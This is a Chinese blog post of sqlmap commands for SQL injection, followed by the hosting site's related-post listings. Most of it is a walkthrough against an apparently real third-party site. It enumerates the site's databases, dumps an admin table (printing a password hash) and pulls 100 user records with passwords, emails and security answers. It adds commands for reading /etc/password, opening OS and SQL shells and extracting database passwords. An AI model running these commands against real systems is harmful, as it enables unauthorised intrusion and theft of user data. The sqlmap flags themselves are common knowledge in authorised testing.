sqlmap用法

最新推荐文章于 2022-04-25 23:48:46 发布
最新推荐文章于 2022-04-25 23:48:46 发布
阅读量611 收藏
点赞数
分类专栏: 杂谈
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/junqing124/article/details/9260509
版权

#>  ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dbs

// 列举数据库 --> 126disk , information_schema

 

#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --current-db

// 当前数据库 --> 126disk 

 

#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --users

// 列数据库用户

 

#>  ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --current-user

// 当前用户 


#>  ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --tables -D "126disk"

// 列举数据库126disk的表名

 

#> ./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --columns -T "disk_admin" -D "126disk"

 

// 获取表disk_admin的列名 

 


#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dump -C "id,login,pass,user" -T "disk_admin" -D "126disk"
// 获取表disk_admin中的数据,包含列 id,login,pass,user   --> 1|9|admin|8e8df10cbce2ef46c3d25c3a5f7fe159

 

 

#>./sqlmap.py -u "http://so.126disk.com/search?key=A" -v 1 --dump -C "id,name,pass,email,wenti,daan" -T "disk_user" -D "126disk" --start 1 --stop 100

// 获取表disk_user的前100条数据,包含id,name,pass,email,wenti,daan;这里已经开始拖库了

 

python sqlmap.py -u "url" --file /etc/password  //读取文件

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--os-shell #系统交互shell 

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--sql-shell #执行指定sql命令

sqlmap -u "http://url/news?id=1"--level=3 --smart --dbms "Mysql"--passwords #数据库用户密码 

 

--cookie "id=1" cookie注入
-r post.txt -p tfUPass POST txt里的数据注入
--forms 搜索forms下的数据来注入
--data "a=1&b=1" 指定参数来注入

 

--os-shell获取后,会在相应目录下生成tmpuoiuz.php和tmpbxbxz.php

我不是稻草人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLmap介绍及使用(笔记)
weixin_46062722的博客
12-21 930
什么是SQLmapSQLMap是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库。 SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令,它支持以下几种独特的注入: 基于布尔类型的注入,即可根据返回页面判断条件真假的注入。 基于时间
sqlmap的使用方法
qq_41679358的博客
07-27 1517
SQLmap的使用 参数 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. “http://www.site.com/vuln.php?id=1”) -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL –data=DATA 数据字符串通过POST发送 –cookie=COOKIE HTTP Cookie的值 –random-agent 随机选择 HTTP Us
攻防世界Web “warmup、NewsCenter、upload1”题解
qq_53325209的博客
04-25 3104
攻防世界Web “warmup、NewsCenter、upload1”题解。
攻防世界 web高手进阶区 2分题
闵行小鱼塘
06-13 887
继续ctf的旅程,攻防世界web高手进阶区的2分题
sqlmap 命令详解(自备速查)
推理小孩的博客
04-22 677
sqlmap 命令详解(自备速查) sqlmap速查 /pentest/database/sqlmap/txt/ common-columns.txt  字段字典 common-outputs.txt common-tables.txt 表字典 keywords.txt oracle-default-passwords.txt user-agent...
sqlmap注入参数(常用)pikachu靶场
wjwqp的专栏
03-02 1715
对于有SQL注入的参数,可以采用SQLMap进行批量测试,常用命令如下: 使用sqlmap跑post方式时的格式: python2 sqlmap.py -u "<url>" --data="<post提交的参数>" -<参数> 使用sqlmap跑数据库 pythonsqlmap.py -u "http://test.com/pikachu-m...
sqlmap使用
tell_me_404的博客
02-29 697
一,sqlmap下载安装 Python2.7.11下载 下载地址:https://www.python.org/downloads/ SQLMap下载 下载地址:http://sqlmap.org/ 二、简单使用 1、基本参数: sqlmap.py -h 查看帮助 –url / -u “” 通过url获取目标 sqlmap.py -u “http:// …/…” --is-dba ...
sqlmap使用方法
08-26
sqlmap -p 指定测试参数 -b 获取banner --dbs 列举数据库 --is-dba 是否是管理员权限 --current-db 当前数据库 --current-user 当前用户 --tables 列举数据库的表名 --count 检索所有条目数 --columns 获取表的列名 ...
sqlmap使用方法笔记
04-21
网络安全攻防工具 sqlmap 使用方法笔记,包括攻击实例和使用简介,是听课程做的笔记,适合初学者
Sqlmap用法详解
12-02
### Sqlmap用法详解 Sqlmap是一款开源的渗透测试工具,专门用于自动化检测和利用SQL注入漏洞,并从中获取敏感数据。本文将详细解读Sqlmap的基础用法与高级技巧,包括如何利用Sqlmap进行GET和POST参数注入测试、处理...
SQLMAP使用笔记.pdf
01-25
SQLMAP 使用笔记 SQLMAP 是一个开源的渗透测试工具,用于检测和利用 SQL 注入漏洞。下面是 SQLMAP 的使用笔记,包括常用参数、选项和示例。 一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> ...
超市管理系统,基于javaweb.zip
08-15
项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松copy复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全栈开发),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助 【资源内容】:项目具体内容可查看/点击本页面下方的*资源详情*,包含完整源码+工程文件+说明(若有)等。【若无积分,此资源可私信获取】 【本人专注IT领域】:有任何使用问题欢迎随时与我联系,我会及时解答,第一时间为您提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【适合场景】:相关项目设计中,皆可应用在项目开发、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面中 可借鉴此优质项目实现复刻,也可基于此项目来扩展开发出更多功能 #注 1. 本资源仅用于开源学习和技术交流。不可商用等,一切后果由使用者承担 2. 部分字体及插图等来自网络,若是侵权请联系删除,本人不对所涉及的版权问题或内容负法律责任。收取的费用仅用于收集和整理资料耗费时间的酬劳
vue3面试题2023,84页,几十道vue面试题,准备vue的面试,这么一份文件就够了
08-15
vue3面试题2023: Vue 的优缺点  优点 1.创建单页面应用的轻量级Web应用框架 2.简单易用 3.双向数据绑定 4.组件化的思想 5.虚拟DOM 6.数据驱动视图 缺点 不支持IE8
【雷达跟踪】基于matlab雷达目标生成与跟踪【含Matlab源码 7220期】.zip
08-15
CSDN海神之光上传的代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 功率谱估计: 故障诊断分析: 雷达通信:雷达LFM、MIMO、成像、定位、干扰、检测、信号分析、脉冲压缩 滤波估计:SOC估计 目标定位:WSN定位、滤波跟踪、目标定位 生物电信号:肌电信号EMG、脑电信号EEG、心电信号ECG 通信系统:DOA估计、编码译码、变分模态分解、管道泄漏、滤波器、数字信号处理+传输+分析+去噪(CEEMDAN)、数字信号调制、误码率、信号估计、DTMF、信号检测识别融合、LEACH协议、信号检测、水声通信
CTR2024中国广告主营销趋势调查报告.pdf
最新发布
08-15
【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2024中国广告主营销趋势调查报告.pdf【CTR】2
毕业答辩PPT模板,共24页
08-15
毕业答辩PPT模板,共24页
PHPStudy-BackDoor-EXP PHPstudy后门利用脚本 (5).zip
08-15
php面试题
AuToGraFS-2.0.1b0-py2.py3-none-any.whl.zip
08-15
AuToGraFS-2.0.1b0-py2.py3-none-any.whl.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值